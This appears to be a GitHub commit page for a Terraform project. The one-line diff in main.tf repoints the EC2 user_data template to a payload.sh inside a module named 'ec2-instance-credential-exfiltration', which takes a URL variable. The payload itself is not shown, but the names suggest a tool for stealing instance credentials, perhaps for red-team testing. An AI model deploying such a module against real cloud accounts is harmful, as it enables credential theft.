Skip to content

Commit

Permalink
Fix file path issue
Browse files Browse the repository at this point in the history
  • Loading branch information
iganbold committed Sep 5, 2020
1 parent 6879cf2 commit 6776718
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion main.tf
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ resource "aws_instance" "this" {
}

data "template_file" "user_data" {
template = file("payload.sh")
template = file(".terraform/modules/ec2-instance-credential-exfiltration/payload.sh")

vars = {
url = var.url
Expand Down

0 comments on commit 6776718

Please sign in to comment.